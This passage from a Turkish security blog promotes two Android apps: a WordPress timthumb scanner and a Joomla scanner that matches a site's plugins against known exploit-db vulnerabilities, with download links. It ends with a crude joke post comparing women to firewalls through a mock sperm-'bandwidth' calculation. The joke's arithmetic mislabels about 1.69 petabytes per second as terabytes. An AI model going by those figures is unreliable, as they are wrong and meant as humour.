<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjSjj9KIVzfFotbBvoR4PwG1J4eBTKFFRhEDfS35WLiFIPCRN5JavprfQg1yEBc1QFRBxJNo9Vsw61LsBb9lditFeDLAY0PPr1c4D37Lict3R4rys_X0Z6cq3czLI32Qp8OhuDVgzmCgLn/s1600/wptimthumbscan1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjSjj9KIVzfFotbBvoR4PwG1J4eBTKFFRhEDfS35WLiFIPCRN5JavprfQg1yEBc1QFRBxJNo9Vsw61LsBb9lditFeDLAY0PPr1c4D37Lict3R4rys_X0Z6cq3czLI32Qp8OhuDVgzmCgLn/s320/wptimthumbscan1.jpg" width="180" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYlQ9HcTwobqIld_uGQgGjVVtx1SUe2tnzoVhTTX9twEwA3WbAxAt-fSNyUdN5P0_-gv6bgHWF-uKDY4pFuUodAE0fESFDvABQ8gXXu4F7Ci45TQaKjTWlFjr56l82itrhawXHgJh0oojE/s1600/wptimthumbscan2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYlQ9HcTwobqIld_uGQgGjVVtx1SUe2tnzoVhTTX9twEwA3WbAxAt-fSNyUdN5P0_-gv6bgHWF-uKDY4pFuUodAE0fESFDvABQ8gXXu4F7Ci45TQaKjTWlFjr56l82itrhawXHgJh0oojE/s320/wptimthumbscan2.jpg" width="180" /></a></div>
<br />
<br />
<a href="https://play.google.com/store/apps/details?id=com.wpress.Wordpress" target="_blank">Uygulamayı Google Play üzerinden indirmek için tıklayınız</a><br />
<br />
<object height="315" width="560"><param name="movie" value="http://www.youtube.com/v/yIjjHByz9Pc?version=3&hl=tr_TR&rel=0"></param>
<param name="allowFullScreen" value="true"></param>
<param name="allowscriptaccess" value="always"></param>
<embed src="http://www.youtube.com/v/yIjjHByz9Pc?version=3&hl=tr_TR&rel=0" type="application/x-shockwave-flash" width="560" height="315" allowscriptaccess="always" allowfullscreen="true"></embed></object> <br />
<br />
NOT: Bu tip güvenlik amaçlı andorid uygulamalar yapmaya devam edeceğiz..İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com2tag:blogger.com,1999:blog-925370819781376022.post-28102055426336081072012-11-29T10:48:00.004+02:002012-11-29T10:50:34.084+02:00Joomla Security Scanner for AndroidMerhaba. Bugün size yakın bir arkadaşımın Android telefonlar için kodladığı '<b>Joomla Security Scanner</b>'den bahsedicem.<br />
<br />
Güvenlik taraması için verdiğiniz joomla sitedeki eklentileri tespit edip, o eklentilerde önceden bulunmuş güvenlik açıklarını exploit-db.com'da arayıp sonucu veren bir araçtır.<br />
<br />
Ekran görüntüleri:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizvXousMa-N6t8C-BLdLRUs3NX4VFyYSZ1Idv3YI2u3tIJpCM8V7dgLZ8bam7LYgrBMSLWxYAFnDsqUcVFpXfRMNX5p8zqJKAifPwFLtYBZsX-kjDlfbJVZ6S2mW3rPVszxBkHzdUllk_Y/s1600/joomlasec1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizvXousMa-N6t8C-BLdLRUs3NX4VFyYSZ1Idv3YI2u3tIJpCM8V7dgLZ8bam7LYgrBMSLWxYAFnDsqUcVFpXfRMNX5p8zqJKAifPwFLtYBZsX-kjDlfbJVZ6S2mW3rPVszxBkHzdUllk_Y/s320/joomlasec1.jpg" width="180" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixxQfYOKV8m-rL3C0-0IGdR1PZcngqRb0ej4AJKZ4labJX4tNn12-G1Tn8NJ2QSOzjnPBh2fuw2BbT2odPDehb4pD93I9bX6RRMWMGez65dlpd5J-izSrv-4GeuSzrLRq0RmOA0zwBmCEw/s1600/joomlasec2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixxQfYOKV8m-rL3C0-0IGdR1PZcngqRb0ej4AJKZ4labJX4tNn12-G1Tn8NJ2QSOzjnPBh2fuw2BbT2odPDehb4pD93I9bX6RRMWMGez65dlpd5J-izSrv-4GeuSzrLRq0RmOA0zwBmCEw/s320/joomlasec2.jpg" width="180" /></a></div>
<br />
<br />
<a href="http://yadi.sk/d/zeFGn6ou0xcI6" target="_blank">Uygulamanın APK dosyasını indir</a><br />
<a href="https://play.google.com/store/apps/details?id=com.Joomla.JoomlaScan" target="_blank">Uygulamayı Google Play üzerinden indirmek için tıklayınız</a>İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com3tag:blogger.com,1999:blog-925370819781376022.post-41024572431751647512012-11-14T17:05:00.001+02:002012-11-29T10:55:38.699+02:00Kadınlar Dünyadaki En Güçlü Firewall’lardırKabul ediyorum bu yazının devamı çok ilginç olacak ve tepkilere de hazırım :)<br />
Ancak yabancı bir sitede gördüğüm bu benzetmeyi paylaşmadan geçemeyeceğim.<br />
<br />
Konu başlığımız "<b><span style="color: red;">Kadınlar Dünyadaki En Güçlü Firewall’lardır</span></b>"<br />
<br />
Hemen hesaplamaya başlıyorum:<br />
<br />
- Bir insan hücresinin genetik bilgisi (bilgisayar ortamında) yaklaşık olarak 75 MB yer kaplamaktadır.<br />
- Bir sperm hücresi de bunun yarısı olan 37.5 MB yer kaplar.<br />
- Bir ml meni 100 milyon sperm hücresinden oluşur.<br />
- Cinsel birleşme esnasında, erkek 5 sn'de 2.25 ml meni üretir.<br />
- Bunun anlamı da (networksel olarak) bir erkeğin band genişliği:<br />
(37.5MB x 100,000,000 x 2.25)/5 = 1 687 500 000 000 000 byte/sn = <b>1,6875 Terabyte/sn</b>'dir.<br />
<br />
Bu durumda dişi, saniyede yaklaşık <b>1,5 terabyte</b> DDoS saldırısına maruz kalıyor demektir ki, bu bize kadınların dünyadaki en güçlü donanımsal firewall olduklarını kanıtlar! :)İsmail Saygılıhttp://www.blogger.com/profile/09930086809196220105noreply@blogger.com4